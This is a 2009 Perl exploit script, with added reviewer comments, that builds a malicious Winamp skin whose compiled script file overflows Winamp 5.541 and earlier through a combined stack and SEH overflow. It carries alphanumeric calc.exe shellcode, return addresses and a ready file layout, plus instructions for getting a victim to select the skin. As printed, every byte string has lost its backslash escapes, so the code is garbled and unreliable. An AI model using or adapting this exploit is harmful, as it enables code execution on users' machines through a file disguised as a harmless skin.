# Title : Winamp <= 5.541 Skin Universal Buffer Overflow Exploit
# Published : 2009-03-05
# Author : SkD
#!/usr/bin/perl
#
# WinAmp <= 5.541 Skin Universal Buffer Overflow Exploit
#
# Discovered and Exploited by SkD (skdrat@hotmail.com)
# -----------------------------------------------------
# WinAmp = http://www.winamp.com
#
# Who doesn't use WinAmp?
#
# This was a 0day for some time, but the release of
# the new version 5.55 fixed the buffer overflow vuln.
# I made it universal and very reliable.
# The vulnerability is a mixture of a standard buffer overflow
# with a SEH overflow, so to make it more stable,
# both of the scenarios will be exploited accordingly when one
# is triggered with my exploit :).
# The exploit can also run any shellcode (alpha) so this makes
# it ever so useful.
#
# Instructions:-
# -Run script.
# -Copy the created exploit directory "SkD's Skin" to
# "C:\Program Files\WinAmp\Skins" OR just install it.
# -Choose the skin from WinAmp :)
#
# Enjoy it ladies and gents :)
#
# Shouts out to: -KkD
# -InTeL
# -Jayji
# -str0ke
#
# Note: Author has no responsibility over the damage done with this!
use strict;
use warnings;
# skin.xml for the generated skin, spelled out as hex byte escapes.  Decoding
# the bytes gives: a UTF-8 BOM (EF BB BF), an XML prolog, and a
# <WinampAbstractionLayer version="1.34"> document with a <skininfo> block
# (name "Bento", author/comment "SkD"), hotkey <accelerators>, an XML comment
# saying the skin reuses resources from 'Big Bento', and two <scripts> sections
# plus an <include> that all reference "s.maki" -- the file this script fills
# with the overflow layout further down.  skin.xml itself carries no payload;
# it is what makes Winamp load the .maki once the skin is selected.
# NOTE(review): as printed, the backslash of every `\x` escape is missing, so
# this literal is ASCII text ("xEFxBB...") rather than the bytes decoded above;
# that looks like transcription damage rather than the author's intent, and the
# same applies to every other byte-string literal in this file.
my $skin_xml = "xEFxBBxBFx3Cx3Fx78x6Dx6Cx20x76x65x72x73x69x6Fx6Ex3Dx22x31x2Ex30x22x20x65x6Ex63x6Fx64x69x6Ex67x3D".
"x22x55x54x46x2Dx38x22x20x73x74x61x6Ex64x61x6Cx6Fx6Ex65x3Dx22x79x65x73x22x3Fx3Ex0Dx0Ax0Dx0Ax3Cx57".
"x69x6Ex61x6Dx70x41x62x73x74x72x61x63x74x69x6Fx6Ex4Cx61x79x65x72x20x76x65x72x73x69x6Fx6Ex3Dx22x31".
"x2Ex33x34x22x3Ex0Dx0Ax09x3Cx73x6Bx69x6Ex69x6Ex66x6Fx3Ex0Dx0Ax09x09x3Cx76x65x72x73x69x6Fx6Ex3Ex31".
"x2Ex32x3Cx2Fx76x65x72x73x69x6Fx6Ex3Ex0Dx0Ax09x09x3Cx6Ex61x6Dx65x3Ex42x65x6Ex74x6Fx3Cx2Fx6Ex61x6D".
"x65x3Ex0Dx0Ax09x09x3Cx61x75x74x68x6Fx72x3Ex53x6Bx44x3Cx2Fx61x75x74x68x6Fx72x3Ex0Dx0Ax09x09x3Cx63".
"x6Fx6Dx6Dx65x6Ex74x3Ex53x6Bx44x3Cx2Fx63x6Fx6Dx6Dx65x6Ex74x3Ex0Dx0Ax09x09x3Cx65x6Dx61x69x6Cx3Ex73".
"x6Bx64x72x61x74x40x68x6Fx74x6Dx61x69x6Cx2Ex63x6Fx6Dx3Cx2Fx65x6Dx61x69x6Cx3Ex0Dx0Ax09x09x3Cx73x63".
"x72x65x65x6Ex73x68x6Fx74x3Ex53x6Bx44x73x68x6Fx74x2Ex70x6Ex67x3Cx2Fx73x63x72x65x65x6Ex73x68x6Fx74".
"x3Ex0Dx0Ax09x09x3Cx68x6Fx6Dx65x70x61x67x65x3Ex68x74x74x70x3Ax2Fx2Fx77x77x77x2Ex53x6Bx44x2Ex63x6F".
"x6Dx2Fx3Cx2Fx68x6Fx6Dx65x70x61x67x65x3Ex0Dx0Ax09x3Cx2Fx73x6Bx69x6Ex69x6Ex66x6Fx3Ex0Dx0Ax0Dx0Ax09".
"x3Cx61x63x63x65x6Cx65x72x61x74x6Fx72x73x20x73x65x63x74x69x6Fx6Ex3Dx22x67x65x6Ex65x72x61x6Cx22x3E".
"x0Dx0Ax09x09x3Cx61x63x63x65x6Cx65x72x61x74x6Fx72x20x62x69x6Ex64x3Dx22x41x6Cx74x2Bx46x22x20x61x63".
"x74x69x6Fx6Ex3Dx22x4Dx45x4Ex55x48x4Fx54x4Bx45x59x5Fx46x49x4Cx45x22x20x2Fx3Ex0Dx0Ax09x09x3Cx61x63".
"x63x65x6Cx65x72x61x74x6Fx72x20x62x69x6Ex64x3Dx22x41x6Cx74x2Bx50x22x20x61x63x74x69x6Fx6Ex3Dx22x4D".
"x45x4Ex55x48x4Fx54x4Bx45x59x5Fx50x4Cx41x59x22x20x2Fx3Ex0Dx0Ax09x09x3Cx61x63x63x65x6Cx65x72x61x74".
"x6Fx72x20x62x69x6Ex64x3Dx22x41x6Cx74x2Bx4Fx22x20x61x63x74x69x6Fx6Ex3Dx22x4Dx45x4Ex55x48x4Fx54x4B".
"x45x59x5Fx4Fx50x54x49x4Fx4Ex53x22x20x2Fx3Ex0Dx0Ax09x09x3Cx61x63x63x65x6Cx65x72x61x74x6Fx72x20x62".
"x69x6Ex64x3Dx22x41x6Cx74x2Bx49x22x20x61x63x74x69x6Fx6Ex3Dx22x4Dx45x4Ex55x48x4Fx54x4Bx45x59x5Fx56".
"x49x45x57x22x20x2Fx3Ex0Dx0Ax09x09x3Cx61x63x63x65x6Cx65x72x61x74x6Fx72x20x62x69x6Ex64x3Dx22x41x6C".
"x74x2Bx48x22x20x61x63x74x69x6Fx6Ex3Dx22x4Dx45x4Ex55x48x4Fx54x4Bx45x59x5Fx48x45x4Cx50x22x20x2Fx3E".
"x0Dx0Ax09x3Cx2Fx61x63x63x65x6Cx65x72x61x74x6Fx72x73x3Ex0Dx0Ax0Dx0Ax09x3Cx61x63x63x65x6Cx65x72x61".
"x74x6Fx72x73x20x73x65x63x74x69x6Fx6Ex3Dx22x6Ex6Fx72x6Dx61x6Cx22x3Ex0Dx0Ax09x09x09x3Cx61x63x63x65".
"x6Cx65x72x61x74x6Fx72x20x62x69x6Ex64x3Dx22x73x70x61x63x65x22x20x61x63x74x69x6Fx6Ex3Dx22x53x48x4F".
"x57x5Fx43x55x52x52x45x4Ex54x5Fx54x52x41x43x4Bx22x20x2Fx3Ex0Dx0Ax09x3Cx2Fx61x63x63x65x6Cx65x72x61".
"x74x6Fx72x73x3Ex0Dx0Ax0Dx0Ax09x3Cx21x2Dx2Dx20x54x68x69x73x20x53x6Bx69x6Ex20x75x73x65x73x20x73x68".
"x61x72x65x64x20x47x72x61x70x68x69x63x73x2Cx20x58x4Dx4Cx20x61x6Ex64x20x4Dx61x6Bx69x20x66x72x6Fx6D".
"x20x27x42x69x67x20x42x65x6Ex74x6Fx27x20x2Dx2Dx3Ex0Dx0Ax0Dx0Ax09x3Cx73x63x72x69x70x74x73x3Ex0Dx0A".
"x09x09x3Cx73x63x72x69x70x74x20x66x69x6Cx65x3Dx22x73x2Ex6Dx61x6Bx69x22x20x70x61x72x61x6Dx3Dx22x73".
"x6Dx61x6Cx6Cx22x2Fx3Ex20x3Cx21x2Dx2Dx20x4Dx75x73x74x20x62x65x20x6Cx6Fx61x64x65x64x20x61x74x20x66".
"x69x72x73x74x20x2Dx2Dx3Ex0Dx0Ax09x3Cx2Fx73x63x72x69x70x74x73x3Ex0Dx0Ax0Dx0Ax09x3Cx69x6Ex63x6Cx75".
"x64x65x20x66x69x6Cx65x3Dx22x73x2Ex6Dx61x6Bx69x22x2Fx3Ex0Dx0Ax0Dx0Ax09x3Cx73x63x72x69x70x74x73x3E".
"x0Dx0Ax09x09x3Cx73x63x72x69x70x74x20x66x69x6Cx65x3Dx22x73x2Ex6Dx61x6Bx69x22x20x70x61x72x61x6Dx3D".
"x22x31x33x30x2Cx31x38x22x2Fx3Ex0Dx0Ax09x3Cx2Fx73x63x72x69x70x74x73x3Ex0Dx0Ax0Dx0Ax3Cx2Fx57x69x6E".
"x61x6Dx70x41x62x73x74x72x61x63x74x69x6Fx6Ex4Cx61x79x65x72x3E";
# Opening portion of the s.maki file: everything written ahead of the filler
# and payload (see the final print).  The bytes begin 46 47 03 04 ("FG" then two
# version-looking bytes) and end with a 2-byte length, 11 00, followed by the
# 17-character identifier "getRuntimeVersion"; the stretch in between is opaque
# and is reproduced here unchanged.  Presumably this is the genuine start of a
# compiled skin script, kept so the file still looks like one to Winamp -- TODO
# confirm against the MAKI file format.
# NOTE(review): `\x` backslashes are missing as printed (see $skin_xml).
my $maki_script1 = "x46x47x03x04x17x00x00x00x27x00x00x00x71x49x65x51x87x0Dx51x4Ax91xE3xA6xB5x32x35xF3xE7x64x0FxF5xD6".
"xFAx93xB7x49x93xF1xBAx66xEFxAEx3Ex98x7BxC4x0DxE9x0Dx84xE7x4AxB0x2Cx04x0BxD2x75xF7xFCxB5x3Ax02xB2".
"x4Dx43xA1x4BxBExAEx59x63x75x03xF3xC6x78x57xC6x87x43xE7xFEx49x85xF9x09xCCx53x2AxFDx56x65x36x60x38".
"x1Bx46xA7x42xAAx75xD8x3Fx66x67xBFx73xF4x7Ax78xF4xBBxB2xF7x4Ex9CxFBxE7x4BxA9xBExA8x8Dx02x0Cx37x3A".
"xBFx3Cx9Fx43x84xF1x86x88x5BxCFx1Ex36xB6x5Bx0Cx5DxE1x7Dx1Fx4BxA7x0Fx8Dx16x59x94x19x41x99xE1xE3x4E".
"x36xC6xECx4Bx97xCDx78xBCx9Cx86x28xB0xE5x95xBEx45x72x20x91x41x93x5CxBBx5FxF9xF1x17xFDx4Ex6Dx90x60".
"x7Ex53x2Ex48xB0x04xCCx94x61x88x56x72xC0xBCx3Ax40x22x6FxD6x4Bx8BxA4x10xC8x29x93x25x47x4Dx3ExAAx97".
"xD0xF4xA8x4Fx81x7Bx0AxF2x2Ax45x49x83xFAxBBxE4x64xF4x81xD9x49xB0xC0xA8x5Bx2ExC3xBCxFDx3Fx5ExB6x62".
"x5Ex37x8Dx40x8DxEAx76x81x4AxB9x1Bx77xBEx97x4FxCExB0x77x19x4Ex99x56xD4x98x33xC9x6Cx27x0Dx20xC2xA8".
"xEBx51x2Ax4BxBAx7Fx5Dx4BxC6x5Dx4Cx71x38xBAx1Ex8Dx9Ex48x3Ex48xB9x60x8Dx1Fx43xC5xC4x05x40xC9x08x0F".
"x39xAFx23x4Bx80xF3xB8xC4x8Fx7ExBBx59x72x86xAAxEFx0Ex31xFAx41xB7xDCx85xA9x52x5BxCBx4Bx44x32xFDx7D".
"x51x37x7Cx4ExBFx40x82xAEx5Fx3AxDCx33x15xFAxB9x5Ax7Dx9Ax57x45xABxC8x65x57xA6xC6x7CxA9xCDxDDx8Ex69".
"x1Ex8FxECx4Fx9Bx12xF9x44xF9x09xFFx45x27xCDx64x6Bx26x5Ax4Bx4Cx8Cx59xE6xA7x0CxF6x49x3AxE4x05xCBx6D".
"xC4x8AxC2x48xB1x93x49xF0x91x0ExF5x4AxFFxCFxDCxB4xFEx81xCCx4Bx96x1Bx72x0FxD5xBEx0FxFFxE1x8CxE2x01".
"x59xB0xD5x11x97x9FxE4xDEx6Fx51x76x0AxBDxF8xF0x80xA5x1BxA6x42xA0x93x32x36xA0x0Cx8Dx4Ax1Bx34x2Ex9B".
"x98x6CxFAx40x8Bx85x0Cx1Bx6ExE8x94x05x71x9BxD5x36xFDx03xF8x4Ax97x95x05x02xB7xDBx26x7Ax10xF2xD5x7F".
"xC4xACxDFx48xA6xA0x54x51x57x6CxDCx76x35xA5xBAxB5xB3x05xCBx4DxADxC1xE6x18xD2x8Fx68x96xC1xFEx29x61".
"xB7xDAx51x4Dx91x65x01xCAx0Cx1Bx70xDBxF7x14x95xD5x36xEDxE8x45x98x0Fx3Fx4ExA0x52x2CxD9x82x4Bx3Bx9B".
"x7Ax66x0Ex42x8FxFCx79x41x15x80x9Cx02x99x31xEDxC7x19x53x98x47x98x63x60xB1x5Ax29x8CxAAx4DxC1xBBxE2".
"xF6x84x73x41xBDxB3xB2xEBx2Fx66x55x50x94x05xC0x73x1Fx96x1Bx40x9Bx1Bx67x24x27xACx41x65x12x00x00x00".
"x01x01x00x00x11x00x67x65x74x52x75x6Ex74x69x6Dx65x56x65x72x73x69x6Fx6E";
# Closing portion of s.maki, appended after the filler and payload.  Decoding
# the bytes gives a table of length-prefixed identifiers (getSkinName,
# getPrivateInt, getTimeOfDay, setPrivateInt, messageBox, integerToString,
# onScriptLoaded, getScriptGroup, getObject, onSetXuiParam, strlower,
# stringToInteger, setText, setXmlparam, onTextChanged, getAutoWidth,
# setXmlParam), a long run of mostly zero / small-integer records, and the
# strings "runtimecheck", "This script requires ", "Winamp 5.54 (skin version
# 1.34)", "Error", "DEBUG", "text", "label", "link", "shift", "tooltip".  In
# other words the tail of an ordinary compiled skin script; it carries no
# payload of its own -- everything active sits in $shellcode.
# NOTE(review): `\x` backslashes are missing as printed (see $skin_xml).
my $maki_script2 = "x01x01x00x00x0Bx00x67x65x74x53x6Bx69x6Ex4Ex61x6Dx65x01x01x00x00x0Dx00x67x65x74x50x72x69x76x61x74".
"x65x49x6Ex74x01x01x00x00x0Cx00x67x65x74x54x69x6Dx65x4Fx66x44x61x79x01x01x00x00x0Dx00x73x65x74x50".
"x72x69x76x61x74x65x49x6Ex74x01x01x00x00x0Ax00x6Dx65x73x73x61x67x65x42x6Fx78x01x01x00x00x0Fx00x69".
"x6Ex74x65x67x65x72x54x6Fx53x74x72x69x6Ex67x01x01x00x00x0Ex00x6Fx6Ex53x63x72x69x70x74x4Cx6Fx61x64".
"x65x64x01x01x00x00x0Ex00x67x65x74x53x63x72x69x70x74x47x72x6Fx75x70x0Ax01x00x00x09x00x67x65x74x4F".
"x62x6Ax65x63x74x01x01x00x00x0Dx00x6Fx6Ex53x65x74x58x75x69x50x61x72x61x6Dx01x01x00x00x08x00x73x74".
"x72x6Cx6Fx77x65x72x01x01x00x00x0Fx00x73x74x72x69x6Ex67x54x6Fx49x6Ex74x65x67x65x72x14x01x00x00x07".
"x00x73x65x74x54x65x78x74x16x01x00x00x0Bx00x73x65x74x58x6Dx6Cx70x61x72x61x6Dx14x01x00x00x0Dx00x6F".
"x6Ex54x65x78x74x43x68x61x6Ex67x65x64x14x01x00x00x0Cx00x67x65x74x41x75x74x6Fx57x69x64x74x68x14x01".
"x00x00x0Bx00x73x65x74x58x6Dx6Cx50x61x72x61x6Dx23x00x00x00x01x01x00x00x00x00x00x00x00x00x00x00x01".
"x01x02x00x00x00x00x00x00x00x00x00x00x00x01x00x02x00x00x00x00x00x00x00x00x00x00x00x01x00x04x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x02x00x00x00x02x00x00x00x00x00x00x00x00x00x02x00x00x00xFFxFFx00".
"x00x00x00x00x00x00x00x02x00x00x00x01x00x00x00x00x00x00x00x00x00x06x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x02x00x00x00x00x00x00x00x00x00x00x00x00x00x02x00x00x00x00x00x00x00x00x00x00x00x00x00x02".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x02x00x00x00x88x13x00x00x00x00x00x00x00x00x06x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x06x00x00x00x00x00x00x00x00x00x00x00x00x00x06x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x06x00x00x00x00x00x00x00x00x00x00x00x00x00x06x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x06x00x00x00x00x00x00x00x00x00x00x00x00x00x02x00x00x00x00x00x00x00x00x00x00x00x00x00x14x01x00".
"x00x00x00x00x00x00x00x00x00x01x00x14x01x00x00x00x00x00x00x00x00x00x00x01x00x16x01x00x00x00x00x00".
"x00x00x00x00x00x01x00x0Ax01x00x00x00x00x00x00x00x00x00x00x01x00x02x00x00x00x00x00x00x00x00x00x00".
"x00x01x00x06x00x00x00x00x00x00x00x00x00x00x00x00x00x06x00x00x00x00x00x00x00x00x00x00x00x00x00x06".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x06x00x00x00x00x00x00x00x00x00x00x00x00x00x06x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x06x00x00x00x00x00x00x00x00x00x00x00x00x00x06x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x06x00x00x00x00x00x00x00x00x00x00x00x00x00x02x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x06x00x00x00x00x00x00x00x00x00x00x00x00x00x06x00x00x00x00x00x00x00x00x00x00x00x00x00x0Dx00x00".
"x00x07x00x00x00x0Cx00x72x75x6Ex74x69x6Dx65x63x68x65x63x6Bx0Cx00x00x00x15x00x54x68x69x73x20x73x63".
"x72x69x70x74x20x72x65x71x75x69x72x65x73x20x0Dx00x00x00x1Fx00x57x69x6Ex61x6Dx70x20x35x2Ex35x34x20".
"x28x73x6Bx69x6Ex20x76x65x72x73x69x6Fx6Ex20x31x2Ex33x34x29x0Ex00x00x00x05x00x45x72x72x6Fx72x0Fx00".
"x00x00x00x00x11x00x00x00x05x00x44x45x42x55x47x18x00x00x00x04x00x74x65x78x74x19x00x00x00x05x00x6C".
"x61x62x65x6Cx1Ax00x00x00x04x00x6Cx69x6Ex6Bx1Dx00x00x00x05x00x73x68x69x66x74x1Ex00x00x00x07x00x74".
"x6Fx6Fx6Cx74x69x70x21x00x00x00x01x00x78x22x00x00x00x01x00x77x03x00x00x00x00x00x00x00x07x00x00x00".
"x5Fx01x00x00x00x00x00x00x0Ax00x00x00xCCx01x00x00x14x00x00x00x0Fx00x00x00x7Bx02x00x00x1Bx03x00x00".
"x01x03x00x00x00x01x00x00x00x00x18x00x00x00x00x30x02x01x03x00x00x00x01x04x00x00x00x0Cx01x03x00x00".
"x00x01x05x00x00x00x0Ax51x10xB9x00x00x00x01x02x00x00x00x01x06x00x00x00x30x02x01x09x00x00x00x01x00".
"x00x00x00x01x08x00x00x00x01x07x00x00x00x01x00x00x00x00x18x01x00x00x00x18x02x00x00x00x30x02x01x0A".
"x00x00x00x01x00x00x00x00x18x03x00x00x00x30x02x01x0Ax00x00x00x01x09x00x00x00x41x01x0Bx00x00x00x0C".
"x01x09x00x00x00x01x0Ax00x00x00x0Cx50x10x06x00x00x00x01x08x00x00x00x21x01x00x00x00x00x01x00x00x00".
"x00x18x03x00x00x00x01x07x00x00x00x01x00x00x00x00x18x01x00x00x00x18x04x00x00x00x02x01x00x00x00x00".
"x01x0Fx00x00x00x01x06x00x00x00x01x0Ex00x00x00x01x0Cx00x00x00x01x0Dx00x00x00x40x18x05x00x00x00x02".
"x01x08x00x00x00x21x01x06x00x00x00x21x01x01x00x00x00x21x03x10x00x00x00x01x00x00x00x00x01x0Fx00x00".
"x00x01x08x00x00x00x01x11x00x00x00x01x10x00x00x00x70x05x00x00x00x04x02x01x01x00x00x00x21x03x12x00".
"x00x00x01x00x00x00x00x01x0Fx00x00x00x01x08x00x00x00x01x11x00x00x00x01x00x00x00x00x01x12x00x00x00".
"x70x06x00x00x00x01x70x05x00x00x00x04x02x01x01x00x00x00x21x01x17x00x00x00x01x08x00x00x00x30x02x19".
"x9CxFExFFxFFx11x06x00x00x00x01x01x00x00x00x21x01x16x00x00x00x01x00x00x00x00x70x08x00x00x00x00x30".
"x02x01x13x00x00x00x01x16x00x00x00x01x18x00x00x00x70x09x00x00x00x01x30x02x01x14x00x00x00x01x16x00".
"x00x00x01x19x00x00x00x70x09x00x00x00x01x30x02x01x15x00x00x00x01x16x00x00x00x01x1Ax00x00x00x70x09".
"x00x00x00x01x30x02x01x01x00x00x00x21x03x1Bx00x00x00x03x1Cx00x00x00x01x02x00x00x00x10x06x00x00x00".
"x01x01x00x00x00x21x01x00x00x00x00x01x1Bx00x00x00x70x0Bx00x00x00x01x01x1Dx00x00x00x08x10x17x00x00".
"x00x01x17x00x00x00x01x00x00x00x00x01x1Cx00x00x00x70x0Cx00x00x00x01x30x02x01x00x00x00x00x01x1Bx00".
"x00x00x70x0Bx00x00x00x01x01x19x00x00x00x08x10x11x00x00x00x01x14x00x00x00x01x1Cx00x00x00x70x0Dx00".
"x00x00x01x02x01x00x00x00x00x01x1Bx00x00x00x70x0Bx00x00x00x01x01x1Ax00x00x00x08x10x16x00x00x00x01".
"x15x00x00x00x01x1Cx00x00x00x01x1Ex00x00x00x70x0Ex00x00x00x02x02x01x01x00x00x00x21x03x1Fx00x00x00".
"x01x02x00x00x00x10x06x00x00x00x01x01x00x00x00x21x01x20x00x00x00x01x14x00x00x00x70x10x00x00x00x00".
"x01x17x00x00x00x40x30x02x01x13x00x00x00x01x00x00x00x00x01x20x00x00x00x70x06x00x00x00x01x01x21x00".
"x00x00x70x11x00x00x00x02x02x01x13x00x00x00x01x00x00x00x00x01x20x00x00x00x4Cx70x06x00x00x00x01x01".
"x22x00x00x00x70x11x00x00x00x02x02x01x01x00x00x00x21x02x01x01x00x00x00x21x02x01x01x00x00x00x21x02".
"x01x01x00x00x00x21x02x01x01x00x00x00x21x02x01x01x00x00x00x21x02x01x01x00x00x00x21";
# win32_exec - EXITFUNC=process CMD=calc.exe Size=338 Encoder=Alpha2 http://metasploit.com
# Payload exactly as emitted by the generator named on the line above: 21 lines
# of 16 bytes plus a final 2 = 338, which matches the stated Size.  The demo
# action is launching calc.exe; the Alpha2 (alphanumeric) encoding is presumably
# what the header means by "any shellcode (alpha)".  This is the only part of
# the generated .maki that does anything -- the rest is filler and the real
# skin script's head and tail.
# NOTE(review): `\x` backslashes are missing as printed (see $skin_xml).
my $shellcode =
"xebx03x59xebx05xe8xf8xffxffxffx49x49x48x49x49x49".
"x49x49x49x49x49x49x49x49x49x49x49x49x51x5ax6ax41".
"x58x30x41x31x50x41x42x6bx41x41x51x41x32x41x41x32".
"x42x41x30x42x41x58x38x41x42x50x75x69x79x4bx4cx4d".
"x38x70x44x55x50x45x50x75x50x6ex6bx77x35x67x4cx6c".
"x4bx43x4cx45x55x74x38x55x51x58x6fx4ex6bx52x6fx45".
"x48x4ex6bx43x6fx65x70x76x61x58x6bx50x49x4ex6bx36".
"x54x4ex6bx75x51x4ax4ex56x51x6bx70x4cx59x6cx6cx6e".
"x64x59x50x70x74x63x37x69x51x78x4ax56x6dx45x51x5a".
"x62x78x6bx6cx34x67x4bx51x44x36x44x74x44x30x75x4d".
"x35x6cx4bx31x4fx31x34x65x51x5ax4bx52x46x4cx4bx74".
"x4cx62x6bx6cx4bx61x4fx77x6cx35x51x7ax4bx6cx4bx57".
"x6cx4cx4bx37x71x5ax4bx4cx49x73x6cx77x54x47x74x38".
"x43x50x31x6bx70x32x44x4ex6bx61x50x66x50x4fx75x6b".
"x70x51x68x44x4cx6cx4bx77x30x36x6cx6ex6bx70x70x77".
"x6cx6cx6dx6cx4bx50x68x73x38x6ax4bx74x49x6cx4bx4b".
"x30x4cx70x63x30x73x30x45x50x4ex6bx45x38x35x6cx53".
"x6fx35x61x4cx36x75x30x71x46x6dx59x4ax58x4bx33x4f".
"x30x31x6bx70x50x43x58x61x6ex6ex38x4bx52x32x53x31".
"x78x4cx58x4bx4ex4cx4ax46x6ex50x57x6bx4fx5ax47x50".
"x63x31x71x30x6cx35x33x44x6ex63x55x44x38x35x35x37".
"x70x41";
# Layout constants for the overflow region of s.maki; the final print shows the
# order they are concatenated in.  The addresses are the author's and, per the
# header, were chosen to hold across the affected Winamp builds.
# NOTE(review): with the `\x` backslashes lost in transcription, `"x41" x 314`
# as printed repeats the 3-character string "x41", not 314 bytes of 0x41, and
# $sehret/$eip are ASCII text rather than the addresses their comments give.
# Defensive note: the long 0x41 and 0x90 runs below (314 + 128 + 8 + 12 bytes)
# dominate the generated file and are the obvious thing for a file scanner to
# key on in a .maki.
my $overflow1 = "x41" x 314;      # filler before the SEH record
my $overflow2 = "x41" x 128;      # filler after the shellcode
my $overflow3 = "x90" x 8;        # 8-byte gap between $sehret and $eip
my $sehjmp = "xebx12x41x41";      # SEH-record part of the layout, with $sehret (header: SEH path)
my $sehret = "x11x10xf0x14"; #0x14f01011 POP, POP, RET WinAmp's aacPlusDecoder.w5s [Universal Address]
my $eip = "xf8x99x01x12"; #0x120199F8 JMP ESP
my $nopsled = "x90" x 12;         # 12-byte sled immediately preceding $shellcode
# Writes the generated skin into the current directory: a "SkD's Skin" folder
# holding skin.xml (from $skin_xml) and s.maki, the compiled-script file that
# carries the overflow layout.  Per the header, Winamp 5.55 corrected the
# overflow; the defensive lesson is that a skin is executable content (it ships
# compiled MAKI scripts), so third-party skins deserve the same caution as any
# other downloaded code.
# NOTE(review): the trailing `n` on each message looks like `\n` with the
# backslash lost in transcription; as printed they are literal characters.
print "[x] WinAmp <= 5.541 Skin Universal Buffer Overflow Exploitn";
print "[x] Discovered and Exploited by SkD (skdrat@ hotmail.com)n";
print "[x] Creating skin dirn";
# Return values unchecked: rmdir fails on a non-empty directory and mkdir fails
# if it already exists, and the script carries on either way.
rmdir("SkD's Skin");
mkdir("SkD's Skin");
print "[x] Creating skin.xml filen";
# 2-arg open with no `or die`, and no binmode, so the XML goes through the
# platform's text layer.  NOTE(review): inside a double-quoted string `\s` is
# not a recognised escape -- perl warns and passes "s" through -- so the path
# as printed is not the "folder\file" the author intended; same for `\s.maki`.
open(my $skin_xml_file, ">SkD's Skin\skin.xml");
print $skin_xml_file $skin_xml;
close $skin_xml_file;
print "[x] Creating malicious MAKI scriptn";
open(my $maki_script_file, ">SkD's Skin\s.maki");
binmode $maki_script_file;                      # raw bytes, unlike skin.xml above
# File layout, front to back: real script head, 314 filler, SEH record
# ($sehjmp, $sehret), 8-byte gap, $eip, 12-byte sled, shellcode, 128 filler,
# real script tail.  Unchecked print/close, so a write error goes unnoticed.
print $maki_script_file $maki_script1.
$overflow1.$sehjmp.$sehret.$overflow3.$eip.$nopsled.$shellcode.$overflow2.
$maki_script2;
close $maki_script_file;
print "[x] Universal exploit created!n";